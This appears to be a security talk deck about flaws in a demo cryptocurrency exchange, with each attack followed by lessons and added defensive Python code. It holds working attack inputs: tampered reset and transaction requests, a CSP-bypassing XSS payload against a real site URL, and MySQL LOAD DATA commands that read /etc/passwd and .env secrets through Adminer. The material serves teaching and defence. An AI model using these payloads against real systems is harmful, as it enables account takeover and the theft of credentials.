MAYASEVEN’s Hacking Diary

Who are we?
Nop Phoomthaisong
Cybersecurity Consultants, Cybersecurity Researcher
MAYASEVEN Team
The Cybersecurity Expert Guys

Agenda
1. Account Takeover via Forgot Password Function
2. Amazon S3 Misconfiguration
3. Arbitrarily Create Bitcoin on Web Cryptocurrency Exchange
4. Attacking JSON Web Token
5. XSS Triggered by CSP Bypass
6. Adminer Arbitrary File Read
7. Poor Cryptography Implementation
8. Code Obfuscation?

MAYASEVEN Cryptocurrency Exchange

Account Takeover via Forgot Password Function

Typical Forgot Password Workflow
1. Click forgot password
2. Insert mobile number (to identify the account owner)
3. Receive OTP
4. Confirm OTP
5. Enter new password
6. Password changed

Account Takeover via Forgot Password
At the "Enter new password" step, intercept the request to the web server with Burp Suite:

POST /forgot-password.php HTTP/1.1
Host: 192.168.1.44:8080
User-Agent: Mozilla/5.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 77
Connection: close
Upgrade-Insecure-Requests: 1

refotp=b097d6&username=mayaseven&password=mynewpass&confirmpassword=mynewpass

Account Takeover via Forgot Password
Change the username in the same request:

POST /forgot-password.php HTTP/1.1
Host: 192.168.1.44:8080
User-Agent: Mozilla/5.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 77
Connection: close
Upgrade-Insecure-Requests: 1

refotp=b097d6&username=mark&password=mynewpass&confirmpassword=mynewpass

Account Takeover via Forgot Password
Demo!

Lesson Learned
• Developers should take care of every stage in the workflow.
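An added example (not from the talk) of a reset flow that fixes this: the account is bound to the reset session at the mobile-number step, and the final request is allowed to carry only the new password, so a changed username field is ignored. The function names, the in-memory stores and the sample users are constructed for the demo.

```python
import hmac
import secrets
import time

# Constructed sample user store: username -> {mobile, password}.
# (A real application stores a password hash, not the password.)
USERS = {
    "mayaseven": {"mobile": "+66000000001", "password": "oldpass-1"},
    "mark": {"mobile": "+66000000002", "password": "oldpass-2"},
}

OTP_TTL_SECONDS = 300
MAX_OTP_ATTEMPTS = 5

# Reset sessions keyed by an opaque server-issued id. The target account is
# fixed here at step 1 and never taken from a later request.
RESET_SESSIONS = {}


def start_reset(mobile):
    """Step 1: identify the account by mobile number and open a reset session."""
    owner = next((u for u, rec in USERS.items() if rec["mobile"] == mobile), None)
    if owner is None:
        return None  # respond identically to success in a real app (no enumeration)
    session_id = secrets.token_urlsafe(32)
    otp = f"{secrets.randbelow(10 ** 6):06d}"
    RESET_SESSIONS[session_id] = {
        "username": owner,
        "otp": otp,
        "expires": time.time() + OTP_TTL_SECONDS,
        "attempts": 0,
        "otp_verified": False,
    }
    return session_id, otp  # the OTP goes out by SMS; only session_id reaches the browser


def confirm_otp(session_id, otp):
    """Step 2: check the OTP against this session only, with an attempt limit."""
    sess = RESET_SESSIONS.get(session_id)
    if sess is None or time.time() > sess["expires"]:
        return False
    sess["attempts"] += 1
    if sess["attempts"] > MAX_OTP_ATTEMPTS:
        RESET_SESSIONS.pop(session_id, None)
        return False
    if not hmac.compare_digest(sess["otp"], otp):
        return False
    sess["otp_verified"] = True
    return True


def set_new_password(session_id, form):
    """Step 3: the form may carry only the new password.

    A username field (as in the intercepted request on the slide) is never
    read: the account to update comes from the reset session.
    """
    sess = RESET_SESSIONS.get(session_id)
    if sess is None or not sess["otp_verified"] or time.time() > sess["expires"]:
        return False
    new_password = form.get("password")
    if not new_password or new_password != form.get("confirmpassword"):
        return False
    USERS[sess["username"]]["password"] = new_password
    RESET_SESSIONS.pop(session_id, None)  # single use: no replay of the last step
    return True


def demo():
    """Start a reset for mayaseven, then post the final step with username=mark."""
    session_id, otp = start_reset("+66000000001")
    assert confirm_otp(session_id, otp)
    ok = set_new_password(session_id, {"username": "mark", "password": "mynewpass",
                                       "confirmpassword": "mynewpass"})
    replay = set_new_password(session_id, {"password": "again", "confirmpassword": "again"})
    return ok, replay, USERS["mayaseven"]["password"], USERS["mark"]["password"]


if __name__ == "__main__":
    print(demo())  # (True, False, 'mynewpass', 'oldpass-2')
```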

Amazon S3 Misconfiguration

Amazon S3 Misconfiguration
The web server keeps all photos in Amazon S3 private cloud storage.
Flow: view photo → the web app generates an access token → the client is redirected to Amazon S3 private storage with the access token → the photo is shown.

Amazon S3 Misconfiguration
Without the access token, we cannot access the photo even when we know the file name.

Account Takeover via Forgot Password
Is it still vulnerable?

Amazon S3 Misconfiguration
Intercept the request with Burp Suite. The web app generates an access token, the client is redirected to Amazon S3 private storage, and id_card_DANIEL.jpg is shown.

GET /api/s3.php?id_card=id_card_DANIEL.jpg HTTP/1.1
Host: 192.168.1.55:8080
User-Agent: Mozilla/5.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Connection: close
Cookie: token=eyJ0eXAiOiJqd3QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjp7InVzZXIiOiJtYXlhc2V2ZW4iLCJ1c2VyaWQiOjEsInRlc3QiOiJ0ZXN0In0sImV4cCI6MTU1ODEyMDUwNH0.9iPkFNFlwF4MK5jD39UqUhrQW4fGS2Mr62l6j6528kI
Upgrade-Insecure-Requests: 1

Amazon S3 Misconfiguration
Intercept the request with Burp Suite. The web app generates an access token, the client is redirected to Amazon S3 private storage, and id_card_mayaseven.jpg is shown.

GET /api/s3.php?id_card=id_card_mayaseven.jpg HTTP/1.1
Host: 192.168.1.55:8080
User-Agent: Mozilla/5.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Connection: close
Cookie: token=eyJ0eXAiOiJqd3QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjp7InVzZXIiOiJtYXlhc2V2ZW4iLCJ1c2VyaWQiOjEsInRlc3QiOiJ0ZXN0In0sImV4cCI6MTU1ODEyMDUwNH0.9iPkFNFlwF4MK5jD39UqUhrQW4fGS2Mr62l6j6528kI
Upgrade-Insecure-Requests: 1

Lesson Learned
• Turn off the bucket permission for "Everyone" (disable object listing).
• The web application must validate authorization before generating a token to access the resource.
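An added example (not the exchange's code) of the second lesson: the handler checks that the session user owns the requested object before minting a signed URL. The HMAC-signed URL is a constructed stand-in for an S3 presigned URL, and the object-to-owner table and signing key are sample data.

```python
import hashlib
import hmac
import time
from urllib.parse import parse_qs, urlencode, urlsplit

# Constructed stand-in for S3 presigning: the storage side accepts a URL only
# with a valid HMAC over (object key, expiry). A real app would call
# boto3's generate_presigned_url here; the ownership check is what matters.
SIGNING_KEY = b"constructed-demo-signing-key"
BUCKET_URL = "https://example-bucket.s3.amazonaws.com"

# Which object belongs to which user id (constructed sample data).
OBJECT_OWNER = {
    "id_card_mayaseven.jpg": 1,
    "id_card_DANIEL.jpg": 2,
}


class Forbidden(Exception):
    pass


def _now(now):
    return time.time() if now is None else now


def presign(object_key, ttl_seconds=60, now=None):
    """Mint a short-lived signed URL for exactly one object."""
    expires = int(_now(now) + ttl_seconds)
    msg = f"{object_key}\n{expires}".encode()
    sig = hmac.new(SIGNING_KEY, msg, hashlib.sha256).hexdigest()
    return f"{BUCKET_URL}/{object_key}?" + urlencode({"expires": expires, "sig": sig})


def verify_presigned(url, now=None):
    """Storage-side check: signature must match and the URL must not be expired."""
    parts = urlsplit(url)
    object_key = parts.path.lstrip("/")
    qs = parse_qs(parts.query)
    try:
        expires = int(qs["expires"][0])
        sig = qs["sig"][0]
    except (KeyError, ValueError):
        return False
    if _now(now) > expires:
        return False
    expected = hmac.new(SIGNING_KEY, f"{object_key}\n{expires}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, sig)


def photo_url_for(session_userid, requested_key):
    """The /api/s3.php equivalent: authorize BEFORE handing out the token.

    session_userid comes from the verified session (the userid claim in the
    JWT cookie on the slide), never from the id_card parameter itself.
    """
    owner = OBJECT_OWNER.get(requested_key)
    if owner is None or owner != session_userid:
        # Same error for "no such object" and "not yours": do not leak existence.
        raise Forbidden("not authorized for this object")
    return presign(requested_key)


def is_authorized(session_userid, requested_key):
    """Boolean wrapper used by the tests."""
    try:
        photo_url_for(session_userid, requested_key)
        return True
    except Forbidden:
        return False


if __name__ == "__main__":
    print(is_authorized(1, "id_card_mayaseven.jpg"), is_authorized(1, "id_card_DANIEL.jpg"))
```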

Arbitrarily Create Bitcoin

Arbitrarily Create Bitcoin
Flow: withdraw cryptocurrency → balance deducted → cancel the withdrawal transaction → cryptocurrency transferred back to the user’s balance.

Arbitrarily Create Bitcoin
Intercept the "cancel a withdrawal transaction" request with Burp Suite; the cryptocurrency is transferred back to the user’s balance.

GET /transaction.php?cancel_withdraw_transactionid=MjQ= HTTP/1.1
Host: 192.168.1.44:8080
User-Agent: Mozilla/5.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Connection: close
Cookie: token=eyJ0eXAiOiJqd3QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjp7InVzZXIiOiJtYXlhc2V2ZW4iLCJ1c2VyaWQiOjEsInRlc3QiOiJ0ZXN0In0sImV4cCI6MTU1ODEyMDM5OX0.E_VOI2BCXNFvmgNhWMQWREfXZc49LSWLW80DESzCPgU
Upgrade-Insecure-Requests: 1

Arbitrarily Create Bitcoin
Demo!

Lesson Learned
• Limit a transaction to being cancelled only once.
• Transaction IDs should be unpredictable.
• Check the authorization.
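An added example (not from the talk) applying all three lessons to the withdrawal/cancel flow: random transaction IDs, a PENDING → CANCELLED state change that can happen only once, and an ownership check against the session user. The ledger, user ids and amounts are constructed; decode_legacy_id only shows that the slide's MjQ= parameter is base64 of a plain counter.

```python
import base64
import secrets
from dataclasses import dataclass, field


class TxError(Exception):
    pass


@dataclass
class Withdrawal:
    tx_id: str
    userid: int
    amount: int             # satoshi, integer: never floats for money
    state: str = "PENDING"  # PENDING -> CANCELLED or PENDING -> SENT, nothing else


@dataclass
class Ledger:
    balances: dict = field(default_factory=dict)     # userid -> satoshi
    withdrawals: dict = field(default_factory=dict)  # tx_id -> Withdrawal

    def request_withdrawal(self, userid, amount):
        if amount <= 0 or self.balances.get(userid, 0) < amount:
            raise TxError("insufficient balance")
        # 128 random bits from the OS CSPRNG: not guessable, unlike a base64 row counter.
        tx_id = secrets.token_urlsafe(16)
        self.balances[userid] -= amount
        self.withdrawals[tx_id] = Withdrawal(tx_id, userid, amount)
        return tx_id

    def mark_sent(self, tx_id):
        tx = self.withdrawals[tx_id]
        if tx.state != "PENDING":
            raise TxError(f"cannot send a transaction that is {tx.state}")
        tx.state = "SENT"

    def cancel_withdrawal(self, session_userid, tx_id):
        tx = self.withdrawals.get(tx_id)
        # Authorization: the session user must own the transaction.
        if tx is None or tx.userid != session_userid:
            raise TxError("unknown transaction")
        # State: refund exactly once, and only while still pending. In a database
        # this must be one atomic step (UPDATE ... WHERE tx_id=? AND state='PENDING',
        # refund only if a row changed) so two concurrent cancels cannot both refund.
        if tx.state != "PENDING":
            raise TxError(f"transaction already {tx.state}")
        tx.state = "CANCELLED"
        self.balances[tx.userid] += tx.amount
        return self.balances[tx.userid]


def decode_legacy_id(tx_param):
    """The slide's cancel_withdraw_transactionid=MjQ= is base64 of a plain counter."""
    return base64.b64decode(tx_param).decode()


def is_rejected(fn, *args):
    """True if the call raises TxError (used to check the negative cases)."""
    try:
        fn(*args)
        return False
    except TxError:
        return True


def demo():
    """Constructed scenario: one withdrawal cancelled by its owner, then the same
    cancel replayed by the owner and tried by another user."""
    ledger = Ledger(balances={1: 100_000, 2: 50_000})
    tx = ledger.request_withdrawal(1, 40_000)
    after_first = ledger.cancel_withdrawal(1, tx)
    replay_rejected = is_rejected(ledger.cancel_withdrawal, 1, tx)
    other_user_rejected = is_rejected(ledger.cancel_withdrawal, 2, tx)
    return after_first, replay_rejected, other_user_rejected, ledger.balances[1]


if __name__ == "__main__":
    print(decode_legacy_id("MjQ="))  # 24
    print(demo())  # (100000, True, True, 100000)
```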

Attacking JSON Web Token

Attacking JSON Web Token
JSON Web Token (JWT):
• A compact and self-contained way of securely transmitting information between parties as a JSON object.
• This information can be verified and trusted because it is digitally signed.
• Consists of three parts separated by dots (.), Header.Payload.Signature, each part Base64url-encoded.
Example: xxxxx.yyyyy.zzzzz

Attacking JSON Web Token
Header:
• The header typically consists of two parts: the token type (JWT) and the signing algorithm.
• This JSON is Base64url-encoded to form the first part of the JWT.

Attacking JSON Web Token
Payload:
• Contains statements about an entity and additional metadata.
• This JSON is Base64url-encoded to form the second part of the JWT.

Attacking JSON Web Token
Signature:
• The encoded header and payload are signed using a key and the algorithm specified in the header.
• The “alg” field in the header defines which algorithm is used for signing.

Attacking JSON Web Token
We cannot change any field of the JWT because of signature verification, so how do we attack a JWT?

Attacking JSON Web Token
Three ways of attacking JWT:
• Cracking the HMAC secret with a wordlist or brute force
• None algorithm attack
• Modifying the algorithm in the “alg” field

Attacking JSON Web Token
Demo!

Lesson Learned
• For HMAC, use a strong symmetric key.
• Never accept the “none” algorithm.
• Use a reliable JWT library.
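An added example (not the library code used in the talk) of a verifier that pins the algorithm server-side: it refuses any alg other than HS256, including none, compares the HMAC in constant time and enforces exp. DEMO_KEY and the claims are constructed; decode_header reads the header of the token shown in the earlier requests.

```python
import base64
import hashlib
import hmac
import json
import secrets
import time

# The server decides which algorithms it accepts; the token's header never does.
ALLOWED_ALGS = {"HS256"}
DEMO_KEY = secrets.token_bytes(32)  # constructed 256-bit key, generated per run


class InvalidToken(Exception):
    pass


def b64url_encode(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def b64url_decode(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _json_part(obj):
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode())


def sign_hs256(claims, key):
    """Issue a token: header.payload signed with HMAC-SHA256 over the encoded parts."""
    signing_input = _json_part({"typ": "JWT", "alg": "HS256"}) + "." + _json_part(claims)
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(sig)


def decode_header(token):
    """Read the (unverified) header, e.g. to see which alg the token claims."""
    try:
        return json.loads(b64url_decode(token.split(".")[0]))
    except Exception as exc:  # malformed base64 or JSON
        raise InvalidToken("malformed header") from exc


def verify_hs256(token, key, now=None):
    """Verify with the algorithm pinned by the server and return the claims."""
    try:
        header_b64, payload_b64, sig_b64 = token.split(".")
        header = json.loads(b64url_decode(header_b64))
        sig = b64url_decode(sig_b64)
        claims = json.loads(b64url_decode(payload_b64))
    except Exception as exc:
        raise InvalidToken("malformed token") from exc
    if not isinstance(header, dict) or not isinstance(claims, dict):
        raise InvalidToken("malformed token")
    # Rejects "none", key-confusion tricks and anything not on the list,
    # whatever the header says.
    if header.get("alg") not in ALLOWED_ALGS:
        raise InvalidToken(f"algorithm not allowed: {header.get('alg')!r}")
    expected = hmac.new(key, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, sig):  # constant-time comparison
        raise InvalidToken("bad signature")
    current = time.time() if now is None else now
    if not isinstance(claims.get("exp"), (int, float)) or current >= claims["exp"]:
        raise InvalidToken("missing or past exp")
    return claims


def none_alg_token(claims):
    """Constructed unsigned token ('alg': 'none', empty signature) for the negative test."""
    return _json_part({"typ": "JWT", "alg": "none"}) + "." + _json_part(claims) + "."


def is_valid(token, key, now=None):
    try:
        verify_hs256(token, key, now)
        return True
    except InvalidToken:
        return False
```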

XSS Triggered by CSP Bypass

XSS Triggered by CSP Bypass
• CSP (Content-Security-Policy)
• A response header to prevent cross-site scripting (XSS resulting from execution of malicious content in the trusted web page context).
Example header:
content-security-policy: default-src 'self'; connect-src 'self'; font-src 'self' https://*.twimg.com https://*.twitter.com data:; frame-src 'self' https://twitter.com https://*.twitter.com; script-src 'self' https://*.twitter.com;

Typical XSS
Flow: the attacker injects a script into a webpage → the victim accesses the webpage → JavaScript is executed.

Implement CSP to Protect Against XSS
Flow: website with a CSP header → the attacker injects a script into a webpage → the victim accesses the webpage → JavaScript is not executed.

Implement CSP to Protect Against XSS
So, how to bypass Content Security Policy?

How to bypass CSP?
Flow: find an XSS entry point → find input returned in the response → inject a script with an external script file → script executed.
• Input returned in response
• Reflection of input arises when data is copied from a request and echoed into the application's immediate response.

XSS Triggered by CSP Bypass
• XSS on a website with CSP
Find XSS entry point: the script could not execute because it was blocked by Content-Security-Policy.
https://careers.twitter.com/en/jobs-search.html?location=1"onmouseove="alert(1)"

XSS Triggered by CSP Bypass
• Input returned in response
Input being returned in the application's responses is not a vulnerability in its own right. However, it is a prerequisite for XSS in this case.
Find input returned in response.

XSS Triggered by CSP Bypass
• Final payload and URL
<script src="//analytics.twitter.com/tpm?tpm_cb=alert(document.domain)>//"></script>
Inject script with external script file.

XSS Triggered by CSP Bypass
Demo!

Lesson Learned
• Input or output should be sanitized.
• CSP alone cannot prevent XSS.
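An added example (not from the talk) of the first lesson, output encoding for the reflected location parameter, assuming the value lands in an input element's value attribute; the parser check shows that after encoding the event handler no longer becomes an attribute. PAYLOAD is reconstructed from the slide's URL with the handler name spelled out as onmouseover.

```python
import html
from html.parser import HTMLParser

# The reflected location parameter as sent in the slide's URL (constructed copy,
# with the handler name spelled out as onmouseover).
PAYLOAD = '1"onmouseover="alert(1)"'


def render_unsafe(location):
    """Reflect the parameter into an attribute with no encoding: the bug."""
    return f'<input name="location" value="{location}">'


def render_safe(location):
    """Encode for the attribute context; quote=True turns " into &quot; so the
    value cannot close the attribute and start a new one."""
    return f'<input name="location" value="{html.escape(location, quote=True)}">'


class InputAttrs(HTMLParser):
    """Parse the fragment the way a tolerant HTML parser (and a browser) does,
    collecting the attributes of each <input>."""

    def __init__(self):
        super().__init__()
        self.inputs = []

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            self.inputs.append(dict(attrs))


def input_attributes(fragment):
    parser = InputAttrs()
    parser.feed(fragment)
    parser.close()
    return parser.inputs[0] if parser.inputs else {}


def injected_handlers(fragment):
    """Names of any on* attributes that ended up on the input, i.e. proof that
    the reflected value broke out of the value attribute."""
    return sorted(k for k in input_attributes(fragment) if k.startswith("on"))


if __name__ == "__main__":
    print(injected_handlers(render_unsafe(PAYLOAD)))  # ['onmouseover']
    print(injected_handlers(render_safe(PAYLOAD)))    # []
```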

Adminer Arbitrary File Read

Adminer Arbitrary File Read
• Adminer
• A database management tool in a single PHP file, which lets the user connect to any database server.
• How to find the Adminer path?
• Dirsearch, wfuzz, etc.

Adminer Arbitrary File Read
• Create databases and tables.
• Use a MySQL command to read local files on the server. In the example below, we read the /etc/passwd file and put its content into the test table on the server.
LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE test.test FIELDS TERMINATED BY "\n"

Adminer Arbitrary File Read
• Read the Nginx configuration file
LOAD DATA LOCAL INFILE '/etc/nginx/sites-enabled/(unknown)' INTO TABLE test.test FIELDS TERMINATED BY "\n"

Adminer Arbitrary File Read
• Read database.php

Adminer Arbitrary File Read
• In a real case, the server used Laravel, and we could read the .env file and find the SSH root password.
• The path of the .env file was found in error handling.
LOAD DATA LOCAL INFILE '/usr/share/nginx/html/mayasevenexchange/.env' INTO TABLE test.test FIELDS TERMINATED BY "\n"

Adminer Arbitrary File Read
Demo!

Lesson Learned
• Remove all unnecessary dependencies.
• Have an inventory of all your components on the client side and server side.
• Monitor sources like Common Vulnerabilities and Exposures (CVE) and the National Vulnerability Database (NVD) for vulnerabilities in the components.
• Obtain components only from official sources.
• Get rid of components that are not actively maintained.
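An added example (not from the talk) on the defender's side of "how to find the Adminer path": it runs over constructed nginx access-log lines and flags clients with a burst of 404s (directory brute force) and successful requests to database admin tools left in the web root. The paths, IPs and the threshold are constructed.

```python
import re
from collections import Counter, defaultdict

# Constructed nginx access-log lines (combined format); IPs are documentation ranges.
SAMPLE_LOG = """\
203.0.113.9 - - [20/May/2019:10:00:01 +0000] "GET /admin/ HTTP/1.1" 404 153 "-" "Mozilla/5.0"
203.0.113.9 - - [20/May/2019:10:00:01 +0000] "GET /adminer/ HTTP/1.1" 404 153 "-" "Mozilla/5.0"
203.0.113.9 - - [20/May/2019:10:00:02 +0000] "GET /phpmyadmin/ HTTP/1.1" 404 153 "-" "Mozilla/5.0"
203.0.113.9 - - [20/May/2019:10:00:02 +0000] "GET /backup.zip HTTP/1.1" 404 153 "-" "Mozilla/5.0"
203.0.113.9 - - [20/May/2019:10:00:03 +0000] "GET /adminer.php HTTP/1.1" 200 9311 "-" "Mozilla/5.0"
203.0.113.9 - - [20/May/2019:10:00:40 +0000] "POST /adminer.php?username=root HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.7 - - [20/May/2019:10:01:00 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [20/May/2019:10:01:05 +0000] "GET /missing.css HTTP/1.1" 404 153 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Database admin tools that should not be reachable on a production web root.
ADMIN_TOOL_RE = re.compile(r"(^|/)(adminer[^/?]*\.php|adminer/|phpmyadmin/)", re.IGNORECASE)
NOT_FOUND_THRESHOLD = 3  # 404s from one client before we call it a path brute force


def parse_log(text):
    """Yield one dict per well-formed line; unparseable lines are skipped."""
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            yield m.groupdict()


def analyse(text):
    """Return (clients over the 404 threshold, successful admin-tool hits by client)."""
    not_found = Counter()
    admin_hits = defaultdict(list)
    for rec in parse_log(text):
        if rec["status"] == "404":
            not_found[rec["ip"]] += 1
        if ADMIN_TOOL_RE.search(rec["path"]) and rec["status"] in ("200", "302"):
            admin_hits[rec["ip"]].append(rec["path"])
    scanners = sorted(ip for ip, n in not_found.items() if n >= NOT_FOUND_THRESHOLD)
    return scanners, dict(admin_hits)


if __name__ == "__main__":
    print(analyse(SAMPLE_LOG))
```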

Poor Cryptography Implementation

Poor Cryptography Implementation
• In the demos above, an attacker could manipulate the request before sending it to the server.
• Some developers thought they could prevent this by encrypting all payloads.
Then what’s the problem?

Normal HTTP request/response (example request and example response shown as screenshots on the slide)

Encrypted HTTP request/response (example request and example response shown as screenshots on the slide)

Poor Cryptography Implementation
Demo!

Lesson Learned
• Attackers always defeat client-side encryption.
• Validate all request data at the backend server.

Code Obfuscation?

Code Obfuscation?
Mobile application:
• An Android application, “MAYASEVEN Exchange”, has a hard-coded key for encrypting/decrypting the JSON data it sends over HTTPS.
Security controls:
• Encrypt all JSON data.
• ProGuard for obfuscation.

Code Obfuscation?
Problem:
• The application used a hard-coded key and IV to encrypt JSON data with the AES/CBC/PKCS7Padding algorithm before sending it to the API server.

Code Obfuscation?
Attack:
• Understand the HTTP request and response.
• Decompile the APK and review the obfuscated code.
• Find the key and IV in the shared object file (libnative-lib.so).
• Manipulate the payload to query data from the server.

Understanding HTTP request and response (example request and example response shown as screenshots on the slide)

Decompile APK and review the code

Found key and IV. Assume that:
IV = zuch58qsgkwtvasj
Key = ghdhrz3qvet3akz6j25bzajbohwh4rnw

Manipulate payload for querying data
We could craft a malicious payload, encrypt it with the same key and IV, and send it to the server!

Lesson Learned
• Attackers still defeat client-side encryption even when the app is obfuscated.
• Validate all request data at the backend server.